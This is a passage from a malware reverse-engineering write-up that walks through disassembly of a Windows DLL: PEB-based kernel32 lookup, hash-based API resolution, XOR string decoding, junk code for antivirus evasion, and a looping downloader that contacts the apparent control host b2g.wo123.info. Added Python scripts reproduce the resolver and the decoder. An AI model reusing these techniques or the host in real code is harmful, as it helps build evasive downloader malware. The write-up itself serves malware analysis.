10001A6D |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A70 |. 8982 EC000000 mov dword ptr [edx+EC], eax
10001A76 |. 68 D3774938 push 384977D3
10001A7B |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A7E |. E8 9DF8FFFF call 10001320
10001A83 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A86 |. 8981 F0000000 mov dword ptr [ecx+F0], eax
10001A8C |. 68 E558D366 push 66D358E5
10001A91 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001A94 |. E8 87F8FFFF call 10001320
10001A99 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001A9C |. 8982 F4000000 mov dword ptr [edx+F4], eax
10001AA2 |. 68 A2341367 push 671334A2
10001AA7 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AAA |. E8 71F8FFFF call 10001320
10001AAF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AB2 |. 8981 F8000000 mov dword ptr [ecx+F8], eax
10001AB8 |. 68 CDF81A09 push 91AF8CD
10001ABD |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AC0 |. E8 FBF7FFFF call <GetAPIAddressByHash_2>
10001AC5 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001AC8 |. 8982 FC000000 mov dword ptr [edx+FC], eax
10001ACE |. 68 15157A25 push 257A1515
10001AD3 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AD6 |. E8 E5F7FFFF call <GetAPIAddressByHash_2>
10001ADB |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001ADE |. 8981 00010000 mov dword ptr [ecx+100], eax
10001AE4 |. 68 A168A759 push 59A768A1
10001AE9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001AEC |. E8 CFF7FFFF call <GetAPIAddressByHash_2>
10001AF1 |. 8B55 9C mov edx, dword ptr [ebp-64]
10001AF4 |. 8982 08010000 mov dword ptr [edx+108], eax
10001AFA |. 68 7BBE2E07 push 72EBE7B
10001AFF |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001B02 |. E8 B9F7FFFF call <GetAPIAddressByHash_2>
10001B07 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001B0A |. 8981 0C010000 mov dword ptr [ecx+10C], eax
10001B10 |. 68 40954A19 push 194A9540
10001B15 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
10001B18 |. E8 A3F7FFFF call <GetAPIAddressByHash_2>
10001B1D |. 8B55 9C mov edx, dword ptr [ebp-64]
10001B20 |. 8982 10010000 mov dword ptr [edx+110], eax
10001B26 |. 8B45 9C mov eax, dword ptr [ebp-64]
10001B29 |. 8BE5 mov esp, ebp
10001B2B |. 5D pop ebp
10001B2C \. C3 retn
Now GetAPIAddressByHash. This call takes the hash of a function name, looks up the corresponding API address and returns it:
10001350 >/$ 55 push ebp
10001351 |. 8BEC mov ebp, esp
10001353 |. 83EC 0C sub esp, 0C
10001356 |. 894D F4 mov dword ptr [ebp-C], ecx
10001359 |. 8B4D F4 mov ecx, dword ptr [ebp-C]
1000135C |. E8 5FFDFFFF call <GetKernel32base>
10001361 |. 8945 F8 mov dword ptr [ebp-8], eax
10001364 |. 8B45 08 mov eax, dword ptr [ebp+8]
10001367 |. 50 push eax
10001368 |. 8B4D F8 mov ecx, dword ptr [ebp-8]
1000136B |. 51 push ecx
1000136C |. 8B4D F4 mov ecx, dword ptr [ebp-C]
1000136F |. E8 ACFEFFFF call <Get_API_BY_Hash>
10001374 |. 8945 FC mov dword ptr [ebp-4], eax
10001377 |. 8B45 FC mov eax, dword ptr [ebp-4]
1000137A |. 8BE5 mov esp, ebp
1000137C |. 5D pop ebp
1000137D \. C2 0400 retn 4
Getting the API address for a given hash takes two steps: first obtain the base address of Kernel32.dll, then use that base together with the hash of the API name to find the function's actual address.
Here is how it obtains the Kernel32 base (a technique widely used in shellcode):
100010C0 >/$ 55 push ebp
100010C1 |. 8BEC mov ebp, esp
100010C3 |. 51 push ecx
100010C4 |. 53 push ebx
100010C5 |. 894D FC mov dword ptr [ebp-4], ecx
100010C8 |. 53 push ebx
100010C9 |. 51 push ecx
100010CA |. 64:8B1D 30000>mov ebx, dword ptr fs:[30] ; PEB address
100010D1 |. 8B4B 0C mov ecx, dword ptr [ebx+C] ; PEB->Ldr (_PEB_LDR_DATA)
100010D4 |. 8B49 1C mov ecx, dword ptr [ecx+1C] ; PEB->Ldr->InInitializationOrderModuleList (_LIST_ENTRY)
100010D7 |. 8B09 mov ecx, dword ptr [ecx] ; first node is ntdll; after this instruction ecx points at the next node, kernel32.dll
100010D9 |. 8B41 08 mov eax, dword ptr [ecx+8] ; +8 in that entry is the module base (DllBase)
100010DC |. 59 pop ecx
100010DD |. 5B pop ebx
100010DE |. 5B pop ebx
100010DF |. 8BE5 mov esp, ebp
100010E1 |. 5D pop ebp
100010E2 \. C3 retn
With the module base in hand, it walks the module's export table and checks whether the hash of any exported function name matches the hash passed in. (A caveat on the kernel32 trick above: it relies on kernel32.dll being the second entry of InInitializationOrderModuleList, which holds on Windows XP/2003; on Windows 7 and later kernelbase.dll is initialised before kernel32.dll and occupies that slot, so this resolver picks the wrong module there.)
As follows:
<Get_API_BY_Hash> (module base already obtained)
10001220 >/$ 55 push ebp
10001221 |. 8BEC mov ebp, esp
10001223 |. 83EC 1C sub esp, 1C
10001226 |. 894D E4 mov dword ptr [ebp-1C], ecx
10001229 |. 8B45 08 mov eax, dword ptr [ebp+8]
1000122C |. 8945 FC mov dword ptr [ebp-4], eax
1000122F |. 8B4D FC mov ecx, dword ptr [ebp-4]
10001232 |. 8B55 08 mov edx, dword ptr [ebp+8]
10001235 |. 0351 3C add edx, dword ptr [ecx+3C]
10001238 |. 8955 F4 mov dword ptr [ebp-C], edx
1000123B |. 8B45 F4 mov eax, dword ptr [ebp-C]
1000123E |. 8B4D 08 mov ecx, dword ptr [ebp+8]
10001241 |. 0348 78 add ecx, dword ptr [eax+78]
10001244 |. 894D F8 mov dword ptr [ebp-8], ecx
10001247 |. C745 F0 01000>mov dword ptr [ebp-10], 1
1000124E |. EB 09 jmp short 10001259
10001250 |> 8B55 F0 /mov edx, dword ptr [ebp-10]
10001253 |. 83C2 01 |add edx, 1
10001256 |. 8955 F0 |mov dword ptr [ebp-10], edx
10001259 |> 8B45 F8 mov eax, dword ptr [ebp-8]
1000125C |. 8B4D F0 |mov ecx, dword ptr [ebp-10]
1000125F |. 3B48 14 |cmp ecx, dword ptr [eax+14]
10001262 |. 73 53 |jnb short 100012B7
10001264 |. 8B55 F8 |mov edx, dword ptr [ebp-8]
10001267 |. 8B45 08 |mov eax, dword ptr [ebp+8]
1000126A |. 0342 20 |add eax, dword ptr [edx+20]
1000126D |. 8B4D F0 |mov ecx, dword ptr [ebp-10]
10001270 |. 8B55 08 |mov edx, dword ptr [ebp+8]
10001273 |. 031488 |add edx, dword ptr [eax+ecx*4]
10001276 |. 52 |push edx
10001277 |. 8B4D E4 |mov ecx, dword ptr [ebp-1C]
1000127A |. E8 71FEFFFF |call 100010F0
1000127F |. 8945 EC |mov dword ptr [ebp-14], eax
10001282 |. 8B45 EC |mov eax, dword ptr [ebp-14]
10001285 |. 3B45 0C |cmp eax, dword ptr [ebp+C]
10001288 |. 75 2B |jnz short 100012B5
1000128A |. 8B4D F8 |mov ecx, dword ptr [ebp-8]
1000128D |. 8B55 08 |mov edx, dword ptr [ebp+8]
10001290 |. 0351 24 |add edx, dword ptr [ecx+24]
10001293 |. 8B45 F0 |mov eax, dword ptr [ebp-10]
10001296 |. 66:8B0C42 |mov cx, word ptr [edx+eax*2]
1000129A |. 66:894D E8 |mov word ptr [ebp-18], cx
1000129E |. 8B55 F8 |mov edx, dword ptr [ebp-8]
100012A1 |. 8B45 08 |mov eax, dword ptr [ebp+8]
100012A4 |. 0342 1C |add eax, dword ptr [edx+1C]
100012A7 |. 0FB74D E8 |movzx ecx, word ptr [ebp-18]
100012AB |. 8B55 08 |mov edx, dword ptr [ebp+8]
100012AE |. 031488 |add edx, dword ptr [eax+ecx*4]
100012B1 |. 8BC2 |mov eax, edx
100012B3 |. EB 04 |jmp short 100012B9
100012B5 |>^ EB 99 \jmp short 10001250
100012B7 |> 33C0 xor eax, eax
100012B9 |> 8BE5 mov esp, ebp
100012BB |. 5D pop ebp
100012BC \. C2 0800 retn 8
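The export walk above, as an added Python model (not code from the sample or from the original post): it builds a constructed minimal export directory and resolves a function by hash step for step as Get_API_BY_Hash does. Two details taken straight from the listing are reproduced deliberately: the counter starts at 1 (mov dword ptr [ebp-10], 1), so the first exported name is never compared, and the loop bound is read from offset 0x14 of the export directory, which is NumberOfFunctions rather than NumberOfNames at 0x18, harmless only when the two counts are equal. The hash routine at 100010F0 is not shown on the page, so the classic ROR-13 string hash is assumed purely as a stand-in; the walk does not depend on which hash is used.

```python
import struct

# Placeholder hash. The sample's own hash routine (call 100010F0) is not shown
# on the page, so ROR-13 is assumed here only so the lookup can be exercised.
def ror13_hash(name: bytes) -> int:
    h = 0
    for b in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h

# Constructed test data: export name -> function RVA, listed in ordinal order.
SAMPLE_EXPORTS = {
    "LoadLibraryA": 0x1400,
    "GetProcAddress": 0x1300,
    "CreateThread": 0x1200,
    "CloseHandle": 0x1100,
}

def build_fake_image(exports: dict) -> bytes:
    """Build a minimal in-memory PE32 image containing only the fields the
    resolver reads: e_lfanew, the export data directory entry, and an export
    directory with its function, name and ordinal tables. Not a real DLL."""
    image = bytearray(0x1000)
    nt, exp, funcs, names, ords, strs = 0x100, 0x200, 0x300, 0x400, 0x500, 0x600
    struct.pack_into("<I", image, 0x3C, nt)        # IMAGE_DOS_HEADER.e_lfanew
    struct.pack_into("<I", image, nt + 0x78, exp)  # DataDirectory[EXPORT].VirtualAddress (PE32)
    n = len(exports)
    # +0x14 NumberOfFunctions, +0x18 NumberOfNames, +0x1C AddressOfFunctions,
    # +0x20 AddressOfNames, +0x24 AddressOfNameOrdinals
    struct.pack_into("<IIIII", image, exp + 0x14, n, n, funcs, names, ords)
    ordinal_of = {name: k for k, name in enumerate(exports)}
    for name, rva in exports.items():
        struct.pack_into("<I", image, funcs + ordinal_of[name] * 4, rva)
    for i, name in enumerate(sorted(exports)):     # the name table is sorted, as in a real PE
        image[strs:strs + len(name) + 1] = name.encode() + b"\0"
        struct.pack_into("<I", image, names + i * 4, strs)
        struct.pack_into("<H", image, ords + i * 2, ordinal_of[name])
        strs += len(name) + 1
    return bytes(image)

def find_export_by_hash(image: bytes, target_hash: int, hash_fn=ror13_hash) -> int:
    """Reproduce Get_API_BY_Hash. Returns the function RVA (the sample adds the
    module base to it) or 0 when nothing matches."""
    u32 = lambda off: struct.unpack_from("<I", image, off)[0]
    u16 = lambda off: struct.unpack_from("<H", image, off)[0]
    nt = u32(0x3C)                   # mov edx,[ebp+8]; add edx,[ecx+3C]
    exp = u32(nt + 0x78)             # add ecx,[eax+78]
    num_functions = u32(exp + 0x14)  # cmp ecx,[eax+14]: NumberOfFunctions, not NumberOfNames
    functions = u32(exp + 0x1C)
    names = u32(exp + 0x20)
    ordinals = u32(exp + 0x24)
    i = 1                            # mov [ebp-10],1: name[0] is never examined
    while i < num_functions:
        name_rva = u32(names + i * 4)
        name = image[name_rva:image.index(0, name_rva)]
        if hash_fn(name) == target_hash:
            ordinal = u16(ordinals + i * 2)       # movzx ecx, word ptr [edx+eax*2]
            return u32(functions + ordinal * 4)   # add edx,[eax+ecx*4]
        i += 1
    return 0

IMAGE = build_fake_image(SAMPLE_EXPORTS)

def resolve(name: str) -> int:
    """Hash a name the way the sample would and look it up in the fake image."""
    return find_export_by_hash(IMAGE, ror13_hash(name.encode()))

if __name__ == "__main__":
    for n in SAMPLE_EXPORTS:
        print(f"{n:16s} hash={ror13_hash(n.encode()):08x} rva={resolve(n):#06x}")
```

In the constructed image CloseHandle sorts first and therefore sits at name index 0, which the loop skips; the lookup returns 0 for it even though it is exported, while the other three names resolve through the ordinal table to the right RVA.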
Two more functions are involved while the API addresses are being filled in, as follows:
... ...
100016CD |. 6A 47 push 47
100016CF |. 6A 0D push 0D
100016D1 |. 8D45 BC lea eax, dword ptr [ebp-44]
100016D4 |. 50 push eax
100016D5 |. 8D4D BC lea ecx, dword ptr [ebp-44]
100016D8 |. 51 push ecx
100016D9 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016DC |. E8 6FF9FFFF call <DecodeString>
100016E1 |. 8D55 A0 lea edx, dword ptr [ebp-60]
100016E4 |. 52 push edx
100016E5 |. 8B4D 9C mov ecx, dword ptr [ebp-64]
100016E8 |. E8 03FBFFFF call <GetApiAddressByName>
... ...
Among them is a string decryption function, <DecodeString>:
10001050 >/$ 55 push ebp
10001051 |. 8BEC mov ebp, esp
10001053 |. 83EC 08 sub esp, 8
10001056 |. 894D F8 mov dword ptr [ebp-8], ecx
10001059 |. C745 FC 00000>mov dword ptr [ebp-4], 0
10001060 |. EB 09 jmp short 1000106B
10001062 |> 8B45 FC /mov eax, dword ptr [ebp-4]
10001065 |. 83C0 01 |add eax, 1
10001068 |. 8945 FC |mov dword ptr [ebp-4], eax
1000106B |> 8B4D FC mov ecx, dword ptr [ebp-4]
1000106E |. 3B4D 10 |cmp ecx, dword ptr [ebp+10]
10001071 |. 7D 16 |jge short 10001089
10001073 |. 8B55 08 |mov edx, dword ptr [ebp+8]
10001076 |. 0355 FC |add edx, dword ptr [ebp-4]
10001079 |. 0FBE02 |movsx eax, byte ptr [edx]
1000107C |. 3345 14 |xor eax, dword ptr [ebp+14]
1000107F |. 8B4D 0C |mov ecx, dword ptr [ebp+C]
10001082 |. 034D FC |add ecx, dword ptr [ebp-4]
10001085 |. 8801 |mov byte ptr [ecx], al
10001087 |.^ EB D9 \jmp short 10001062
10001089 |> 8BE5 mov esp, ebp
1000108B |. 5D pop ebp
1000108C \. C2 1000 retn 10
The decryption routine above recovers encrypted API (and module) names; <GetApiAddressByName> is then called to obtain the API address directly.
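As an added example (not the author's code), the following Python reproduces DecodeString on the byte sequences copied from the Fill_API_Address listing above, with the key and length taken from the two pushes immediately before each call. The three module names it recovers (User32.DLL, Wininet.dll, Advapi32.dll) are the strings passed to the API at [obj+0], whose return values are stored at +118, +114 and +11C; that slot is therefore most likely LoadLibraryA (an inference, since the hash 94C4C32 is not resolved on the page), while [obj+4] is GetProcAddress as the author's comment at 10001212 shows. Two properties visible in the data are also checked: every encoded buffer starts with 0x00 and ends with the key byte, because the first plaintext character was used as the XOR key, so it decodes to itself and the NUL terminator decodes from the key.

```python
# Bytes copied from the mov byte ptr [ebp-xx] sequences in Fill_API_Address,
# paired with the key pushed before the corresponding DecodeString call.
ENCODED = {
    "100013D4 [ebp-C]":  (bytes([0x00,0x26,0x30,0x27,0x66,0x67,0x7B,0x11,0x19,0x19,0x55]), 0x55),
    "10001428 [ebp-24]": (bytes([0x00,0x3E,0x39,0x3E,0x39,0x32,0x23,0x79,0x33,0x3B,0x3B,0x57]), 0x57),
    "10001480 [ebp-34]": (bytes([0x00,0x25,0x37,0x20,0x31,0x28,0x72,0x73,0x6F,0x25,0x2D,0x2D,0x41]), 0x41),
    "10001625 [ebp-60]": (bytes([0x00,0x2D,0x29,0x38,0x09,0x24,0x24,0x27,0x2B,0x48]), 0x48),
    "1000164D [ebp-18]": (bytes([0x00,0x2D,0x29,0x38,0x0E,0x3A,0x2D,0x2D,0x48]), 0x48),
    "10001671 [ebp-44]": (bytes([0x00,0x22,0x33,0x0B,0x26,0x34,0x33,0x02,0x35,0x35,0x28,0x35,0x47]), 0x47),
    "100019B9 [ebp-54]": (bytes([0x00,0x3F,0x24,0x22,0x23,0x37,0x3A,0x17,0x3A,0x3A,0x39,0x35,0x13,0x2E,0x56]), 0x56),
}

def decode_string(src: bytes, length: int, key: int) -> bytes:
    """Mirror of DecodeString(src, dst, length, key): dst[i] = src[i] ^ key.
    The sample decodes in place (src == dst); here the result is returned."""
    return bytes(b ^ key for b in src[:length])

def recover_key(src: bytes) -> int:
    """The plaintext is NUL-terminated and the encoder XORed the terminator too,
    so the last encoded byte is the key itself (0 ^ key == key). Handy when the
    push of the key is not in view."""
    return src[-1]

def decode_all(table=ENCODED) -> dict:
    """Decode every buffer, checking the key against the one the sample pushes
    and that the first byte is 0 (first plaintext character == key)."""
    out = {}
    for where, (src, key) in table.items():
        if recover_key(src) != key or src[0] != 0:
            raise ValueError(f"unexpected layout at {where}")
        out[where] = decode_string(src, len(src), key).rstrip(b"\0").decode("ascii")
    return out

if __name__ == "__main__":
    for where, text in decode_all().items():
        print(f"{where:18s} -> {text}")
```

Running it prints the three module names followed by HeapAlloc, HeapFree, GetLastError and VirtualAllocEx, i.e. exactly the names handed to GetApiAddressByName at +20, +28, +1C and +D4.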
<GetApiAddressByName>:
100011F0 >/$ 55 push ebp
100011F1 |. 8BEC mov ebp, esp
100011F3 |. 83EC 08 sub esp, 8
100011F6 |. 894D F8 mov dword ptr [ebp-8], ecx
100011F9 |. 8B4D F8 mov ecx, dword ptr [ebp-8]
100011FC |. E8 BFFEFFFF call <GetKernel32base>
10001201 |. 8945 FC mov dword ptr [ebp-4], eax
10001204 |. 8B45 08 mov eax, dword ptr [ebp+8]
10001207 |. 50 push eax
10001208 |. 8B4D FC mov ecx, dword ptr [ebp-4]
1000120B |. 51 push ecx
1000120C |. 8B55 F8 mov edx, dword ptr [ebp-8]
1000120F |. 8B42 04 mov eax, dword ptr [edx+4]
10001212 |. FFD0 call eax ; kernel32.GetProcAddress
10001214 |. 8BE5 mov esp, ebp
10001216 |. 5D pop ebp
10001217 \. C2 0400 retn 4
With the API table filled in, look at
1000102A |. E8 91210000 call 100031C0 , this call.
It first creates a mutex named ~~~!~~~ (built on the stack at 100031FC) and then starts two threads; the push eax / mov eax,... / pop eax runs at its start are the junk code mentioned above:
100031C0 /$ 55 push ebp
100031C1 |. 8BEC mov ebp, esp
100031C3 |. 83EC 10 sub esp, 10
100031C6 |. 894D F0 mov dword ptr [ebp-10], ecx
100031C9 |. 50 push eax
100031CA |. B8 01000000 mov eax, 1
100031CF |. B8 04000000 mov eax, 4
100031D4 |. B8 0A000000 mov eax, 0A
100031D9 |. 58 pop eax
100031DA |. 50 push eax
100031DB |. B8 01000000 mov eax, 1
100031E0 |. B8 04000000 mov eax, 4
100031E5 |. B8 0A000000 mov eax, 0A
100031EA |. 58 pop eax
100031EB |. 50 push eax
100031EC |. B8 01000000 mov eax, 1
100031F1 |. B8 04000000 mov eax, 4
100031F6 |. B8 0A000000 mov eax, 0A
100031FB |. 58 pop eax
100031FC |. C645 F8 7E mov byte ptr [ebp-8], 7E
10003200 |. C645 F9 7E mov byte ptr [ebp-7], 7E
10003204 |. C645 FA 7E mov byte ptr [ebp-6], 7E
10003208 |. C645 FB 21 mov byte ptr [ebp-5], 21
1000320C |. C645 FC 7E mov byte ptr [ebp-4], 7E
10003210 |. C645 FD 7E mov byte ptr [ebp-3], 7E
10003214 |. C645 FE 7E mov byte ptr [ebp-2], 7E
10003218 |. C645 FF 00 mov byte ptr [ebp-1], 0
1000321C |. 8D45 F8 lea eax, dword ptr [ebp-8]
1000321F |. 50 push eax
10003220 |. 6A 00 push 0
10003222 |. 6A 00 push 0
10003224 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
10003227 |. 8B51 34 mov edx, dword ptr [ecx+34]
1000322A |. FFD2 call edx ; CreateMutex
1000322C |. 6A 00 push 0
1000322E |. 6A 00 push 0
10003230 |. 8B45 F0 mov eax, dword ptr [ebp-10]
10003233 |. 50 push eax
10003234 |. 68 80310010 push <ThreadFunc1> ; ThreadFunc1
10003239 |. 6A 00 push 0
1000323B |. 6A 00 push 0
1000323D |. 8B4D F0 mov ecx, dword ptr [ebp-10]
10003240 |. 8B51 38 mov edx, dword ptr [ecx+38]
10003243 |. FFD2 call edx ; CreateThread
10003245 |. 8945 F4 mov dword ptr [ebp-C], eax
10003248 |. 8B45 F4 mov eax, dword ptr [ebp-C]
1000324B |. 50 push eax
1000324C |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000324F |. 8B91 84000000 mov edx, dword ptr [ecx+84]
10003255 |. FFD2 call edx ; CloseHandle
10003257 |. 6A 00 push 0
10003259 |. 6A 00 push 0
1000325B |. 8B45 F0 mov eax, dword ptr [ebp-10]
1000325E |. 50 push eax
1000325F |. 68 60310010 push <ThreadFunc2>
10003264 |. 6A 00 push 0
10003266 |. 6A 00 push 0
10003268 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000326B |. 8B51 38 mov edx, dword ptr [ecx+38]
1000326E |. FFD2 call edx ; CreateThread
10003270 |. 8945 F4 mov dword ptr [ebp-C], eax
10003273 |. 6A FF push -1
10003275 |. 8B45 F4 mov eax, dword ptr [ebp-C]
10003278 |. 50 push eax
10003279 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
1000327C |. 8B51 3C mov edx, dword ptr [ecx+3C]
1000327F |. FFD2 call edx ; WaitForSingleObject
10003281 |. 33C0 xor eax, eax
10003283 |. 8BE5 mov esp, ebp
10003285 |. 5D pop ebp
10003286 \. C3 retn
The head of this call is again a pile of junk code, there for AV evasion.
It then creates a mutex named "~~~!~~~" and directly starts two threads, 10003180 and 10003160.
The handle of thread 3180 is closed straight away with CloseHandle, while the handle of thread 10003160 is waited on with WaitForSingleObject, so that the process only exits once all the actions have completed.
Stepping into ThreadFunc1:
10003180 >/. 55 push ebp
10003181 |. 8BEC mov ebp, esp
10003183 |. 51 push ecx
10003184 |. 8B45 08 mov eax, dword ptr [ebp+8]
10003187 |. 8945 FC mov dword ptr [ebp-4], eax
1000318A |. 8B4D FC mov ecx, dword ptr [ebp-4]
1000318D |. E8 4EFFFFFF call <_Thread_func1>
10003192 |. 8BE5 mov esp, ebp
10003194 |. 5D pop ebp
10003195 \. C2 0400 retn 4
<_Thread_func1>:
100030E0 >/$ 55 push ebp
100030E1 |. 8BEC mov ebp, esp
100030E3 |. 81EC 30010000 sub esp, 130
100030E9 |. 898D D0FEFFFF mov dword ptr [ebp-130], ecx
100030EF |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
100030F5 |. E8 86FDFFFF call <Fill_Rubbish_Code>
100030FA |> B8 01000000 /mov eax, 1
100030FF |. 85C0 |test eax, eax
10003101 |. 74 38 |je short 1000313B ; this jump is never taken: an infinite loop.
10003103 |. 50 |push eax
10003104 |. B8 01000000 |mov eax, 1
10003109 |. B8 04000000 |mov eax, 4
1000310E |. B8 05000000 |mov eax, 5
10003113 |. B8 06000000 |mov eax, 6
10003118 |. B8 0A000000 |mov eax, 0A
1000311D |. 58 |pop eax
1000311E |. 8D8D D8FEFFFF |lea ecx, dword ptr [ebp-128]
10003124 |. E8 37FAFFFF |call 10002B60
10003129 |. 68 A0BB0D00 |push 0DBBA0
1000312E |. 8B8D D0FEFFFF |mov ecx, dword ptr [ebp-130]
10003134 |. 8B51 40 |mov edx, dword ptr [ecx+40]
10003137 |. FFD2 |call edx
10003139 |.^ EB BF \jmp short 100030FA
1000313B |> C785 D4FEFFFF>mov dword ptr [ebp-12C], 0
10003145 |. 8D8D D8FEFFFF lea ecx, dword ptr [ebp-128]
1000314B |. E8 F0F9FFFF call 10002B40
10003150 |. 8B85 D4FEFFFF mov eax, dword ptr [ebp-12C]
10003156 |. 8BE5 mov esp, ebp
10003158 |. 5D pop ebp
10003159 \. C3 retn
The Fill_Rubbish_Code call just fills in lots of junk code.
The call to 2B60 is where the download work starts:
10002B60 /$ 55 push ebp
10002B61 |. 8BEC mov ebp, esp
10002B63 |. 81EC 40020000 sub esp, 240
10002B69 |. 898D C0FDFFFF mov dword ptr [ebp-240], ecx
10002B6F |. 50 push eax
10002B70 |. B8 01000000 mov eax, 1
10002B75 |. B8 08000000 mov eax, 8
10002B7A |. B8 09000000 mov eax, 9
10002B7F |. B8 0A000000 mov eax, 0A
10002B84 |. 58 pop eax
10002B85 |. 50 push eax
10002B86 |. B8 01000000 mov eax, 1
10002B8B |. B8 02000000 mov eax, 2
10002B90 |. B8 0A000000 mov eax, 0A
10002B95 |. 58 pop eax
10002B96 |. 68 04010000 push 104
10002B9B |. 8D85 E8FEFFFF lea eax, dword ptr [ebp-118]
10002BA1 |. 50 push eax
10002BA2 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002BA8 |. 8B51 30 mov edx, dword ptr [ecx+30]
10002BAB |. FFD2 call edx ; kernel32.GetSystemDirectoryA
10002BAD |. 68 8A7F0000 push 7F8A
10002BB2 |. 68 007F0000 push 7F00
10002BB7 |. 6A 00 push 0
10002BB9 |. 8B85 C0FDFFFF mov eax, dword ptr [ebp-240]
10002BBF |. 8B88 F4000000 mov ecx, dword ptr [eax+F4]
10002BC5 |. FFD1 call ecx
10002BC7 |. 50 push eax
10002BC8 |. 8B95 C0FDFFFF mov edx, dword ptr [ebp-240]
10002BCE |. 8B82 F8000000 mov eax, dword ptr [edx+F8]
10002BD4 |. FFD0 call eax
10002BD6 |. 50 push eax
10002BD7 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002BDD |. 8B91 F0000000 mov edx, dword ptr [ecx+F0]
10002BE3 |. FFD2 call edx
10002BE5 |. 50 push eax
10002BE6 |. B8 01000000 mov eax, 1
10002BEB |. B8 0A000000 mov eax, 0A
10002BF0 |. 58 pop eax
10002BF1 |. C745 F4 00000>mov dword ptr [ebp-C], 0
10002BF8 |. 8D45 F4 lea eax, dword ptr [ebp-C]
10002BFB |. 50 push eax
10002BFC |. 68 00500010 push 10005000 ; http://b2g.wo123.info/02/count.txt
10002C01 |. 8B8D C0FDFFFF mov ecx, dword ptr [ebp-240]
10002C07 |. E8 E4FCFFFF call 100028F0
10002C0C |. 8945 F8 mov dword ptr [ebp-8], eax
10002C0F |. 8B4D F8 mov ecx, dword ptr [ebp-8]
10002C12 |. 894D FC mov dword ptr [ebp-4], ecx
10002C15 |. 50 push eax
10002C16 |. B8 01000000 mov eax, 1
10002C1B |. B8 0A000000 mov eax, 0A
10002C20 |. 58 pop eax
10002C21 |. C785 E4FEFFFF>mov dword ptr [ebp-11C], 0
10002C2B |. EB 0F jmp short 10002C3C
10002C2D |> 8B95 E4FEFFFF /mov edx, dword ptr [ebp-11C]
10002C33 |. 83C2 01 |add edx, 1
10002C36 |. 8995 E4FEFFFF |mov dword ptr [ebp-11C], edx
10002C3C |> 8B85 E4FEFFFF mov eax, dword ptr [ebp-11C]
10002C42 |. 3B45 F4 |cmp eax, dword ptr [ebp-C]
10002C45 |. 0F83 F2010000 |jnb 10002E3D
10002C4B |. 8B4D F8 |mov ecx, dword ptr [ebp-8]
10002C4E |. 038D E4FEFFFF |add ecx, dword ptr [ebp-11C]
10002C54 |. 0FBE11 |movsx edx, byte ptr [ecx]
10002C57 |. 83FA 0D |cmp edx, 0D
10002C5A |. 0F85 D8010000 |jnz 10002E38
10002C60 |. 8B45 F8 |mov eax, dword ptr [ebp-8]
10002C63 |. 0385 E4FEFFFF |add eax, dword ptr [ebp-11C]
10002C69 |. 0FBE48 01 |movsx ecx, byte ptr [eax+1]
10002C6D |. 83F9 0A |cmp ecx, 0A
10002C70 |. 0F85 C2010000 |jnz 10002E38
10002C76 |. 8B55 F8 |mov edx, dword ptr [ebp-8]
10002C79 |. 0395 E4FEFFFF |add edx, dword ptr [ebp-11C]
10002C7F |. C602 00 |mov byte ptr [edx], 0
10002C82 |. C785 DCFEFFFF>|mov dword ptr [ebp-124], 0
10002C8C |. 8D85 DCFEFFFF |lea eax, dword ptr [ebp-124]
10002C92 |. 50 |push eax
10002C93 |. 8B4D FC |mov ecx, dword ptr [ebp-4]
10002C96 |. 83C1 02 |add ecx, 2
10002C99 |. 51 |push ecx
10002C9A |. 8B8D C0FDFFFF |mov ecx, dword ptr [ebp-240]
10002CA0 |. E8 4BFCFFFF |call 100028F0
... ... lots of code omitted ... ...
We see http://b2g.wo123.info/02/count.txt, so let's look at the 100028F0 call that follows.
100028F0 /$ 55 push ebp
100028F1 |. 8BEC mov ebp, esp
100028F3 |. 83EC 24 sub esp, 24
100028F6 |. 894D DC mov dword ptr [ebp-24], ecx
100028F9 |. C745 F8 00000>mov dword ptr [ebp-8], 0
10002900 |. 50 push eax ; rubbish code
10002901 |. B8 01000000 mov eax, 1
10002906 |. B8 02000000 mov eax, 2
1000290B |. B8 03000000 mov eax, 3
10002910 |. B8 04000000 mov eax, 4
10002915 |. B8 05000000 mov eax, 5
1000291A |. B8 06000000 mov eax, 6
1000291F |. B8 07000000 mov eax, 7
10002924 |. B8 08000000 mov eax, 8
10002929 |. B8 0A000000 mov eax, 0A
1000292E |. 58 pop eax
1000292F |. C645 FC 49 mov byte ptr [ebp-4], 49
10002933 |. C645 FD 4E mov byte ptr [ebp-3], 4E
10002937 |. C645 FE 54 mov byte ptr [ebp-2], 54
1000293B |. C645 FF 00 mov byte ptr [ebp-1], 0
1000293F |. 6A 00 push 0
10002941 |. 6A 00 push 0
10002943 |. 6A 00 push 0
10002945 |. 6A 00 push 0
10002947 |. 8D45 FC lea eax, dword ptr [ebp-4]
1000294A |. 50 push eax
1000294B |. 8B4D DC mov ecx, dword ptr [ebp-24]
1000294E |. 8B91 B4000000 mov edx, dword ptr [ecx+B4]
10002954 |. FFD2 call edx ; InternetOpenA
10002956 |. 8945 F0 mov dword ptr [ebp-10], eax
10002959 |. 6A 00 push 0
1000295B |. 68 000000C0 push C0000000
10002960 |. 6A 00 push 0
10002962 |. 6A 00 push 0
10002964 |. 8B45 08 mov eax, dword ptr [ebp+8]
10002967 |. 50 push eax
10002968 |. 8B4D F0 mov ecx, dword ptr [ebp-10]
